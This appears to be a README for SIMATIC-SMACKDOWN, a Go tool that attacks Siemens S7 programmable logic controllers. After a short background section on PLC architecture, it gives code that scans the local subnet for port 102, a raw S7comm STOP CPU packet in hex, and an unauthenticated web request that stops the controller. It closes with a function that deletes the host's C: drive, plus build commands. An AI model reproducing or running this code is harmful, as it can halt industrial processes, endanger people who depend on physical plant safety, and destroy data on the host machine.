A simple and compact program targeting SIMATIC S7 Programmable Logic Controllers (PLCs) written in Go. Allowing for cross-compilation to target multiple operating systems out of the box, SIMATIC-SMACKDOWN enumerates networks for S7 devices before launching a distributed attack to STOP PLC CPUs.
SIMATIC is a series of programmable logic controller and automation systems developed by Siemens. The series has gone through four major generations, the latest being the SIMATIC S7 generation. These PLCs are small industrial computers with modular components designed to automate customized control processes. To understand a PLC system, it is best to breakdown the system into two primary parts: the central processing unit (CPU) and the input/output (I/O) interface system.
The central processing unit contains memory and a communication system needed to instruct the PLC on how to perform. Hence, the reason why CPUs are the “brain” of programmable logic controllers. This is also where data processing and diagnostics take place. The communication system allows the CPU to communicate with other devices such as I/O devices, programming devices, and other PLC systems.
Input/output (I/O) modules relay the necessary information to the CPU and communicate the required task in a continuous loop. Input and output devices can either be digital or analog form: digital devices are finite values represented in values of 1 or 0, analog devices are infinite values, and measure ranges of currents or voltages. Inputs or providers are switches, sensors, and smart devices in analog or digital forms. Outputs can be motor starters, lights, valves, and smart devices.
The automation process can be seen in the image below:
But what if we could send a signal to turn off the CPU so that communication between the device and the operator could not occur?
SIMATIC-SMACKDOWN operates in three phases: interface enumeration, PLC scanning, and STOP PLC CPU.
The first phase of the program enumerates local network interfaces, gathering information about the host's environment:
// Get Private Interface
for _, address := range addrs {
// only add non loopback IPv4 addresses
ipnet, ok := address.(*net.IPNet)
if ok && ipnet.IP.To4() != nil && !ipnet.IP.IsLoopback() {
var ip_addr = ipnet.IP
return ip_addr.String()
}
}
return ""
After determining the private IP address, the program enumerates the subnet for devices listening on TCP 102, which is defined as ISO-TSAP Transport Service Access Point) Class 0 protocol and utilized by Siemens S7Comm communications.
// Connect to device ports
for i := range ip_list {
target := ip_list[i] + ":102"
conn, err := net.DialTimeout("tcp", target, 1 * time.Second)
if err != nil {
continue
} else {
scanned_ips = append(scanned_ips, ip_list[i])
}
conn.Close()
}
return scanned_ips
Once the program identifies the PLCs, SIMATIC-SMACKDOWN launches a STOP CPU command via raw data to the controller. If the device is not password protected, it will turn off the PLC's CPU and stop operations. This functionality has only been tested on an S7-300 and S7-1200.
// Connect to device ports
stop := "\x03\x00\x00\x21\x02\xf0\x80\x32\x01\x00\x00\x06\x00\x00\x10\x00\x00\x29\x00\x00\x00\x00\x00\x09\x50\x5f\x50\x52\x4f\x47\x52\x41\x4d"
for i := range scanned_ips {
target := scanned_ips[i] + ":102"
conn, err := net.Dial("tcp", target)
if err != nil {
continue
} else {
_, err = conn.Write([]byte(stop))
}
conn.Close()
}
After sending the termination command to the controller, the program sends an additional STOP CPU via the web interface. If the device is configured to "allow Everybody to change operating mode (Start/Stop)" in the webserver user management, this unauthenticated access will stop controller operations.
for i := range scanned_ips {
client := &http.Client{}
var data = strings.NewReader(`Run=1&PriNav=Stop`)
req, err := http.NewRequest("POST", "http://"+scanned_ips[i]+"/CPUCommands", data)
if err != nil {
continue
}
req.Header.Set("Host", scanned_ips[i])
req.Header.Set("Content-Length", "19")
req.Header.Set("Cache-Control", "max-age=0")
req.Header.Set("Upgrade-Insecure-Requests", "1")
req.Header.Set("Origin", "http://"+scanned_ips[i])
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("User-Agent", "Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36")
req.Header.Set("Accept", "text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9")
req.Header.Set("Referer", "http://"+scanned_ips[i]+"/Portal/Portal.mwsl?PriNav=Start")
req.Header.Set("Accept-Encoding", "gzip, deflate")
req.Header.Set("Accept-Language", "en-US, en; q=0.9")
req.Header.Set("Connection", "close")
req.Header.Set("Cookie", "siemens_automation_no_intro=TRUE")
resp, err := client.Do(req)
The PLC STOP commands are demonstrated in the following network capture:
The program proceeds to wipe the filesystem of the device, deleting files accessible and owned by the current user. The damage from this function is dependent on administrative privileges and security context in which the program is run. Running the program as root or administrator will devastate the device.
func KillWindows() {
// If current user does not have administrative privileges, removes files owned by current user
err := os.RemoveAll("C:\\")
if err != nil {
return
}
}
git clone https://github.com/RoseSecurity/SIMATIC-SMACKDOWN.git
cd SIMATIC-SMACKDOWN
make build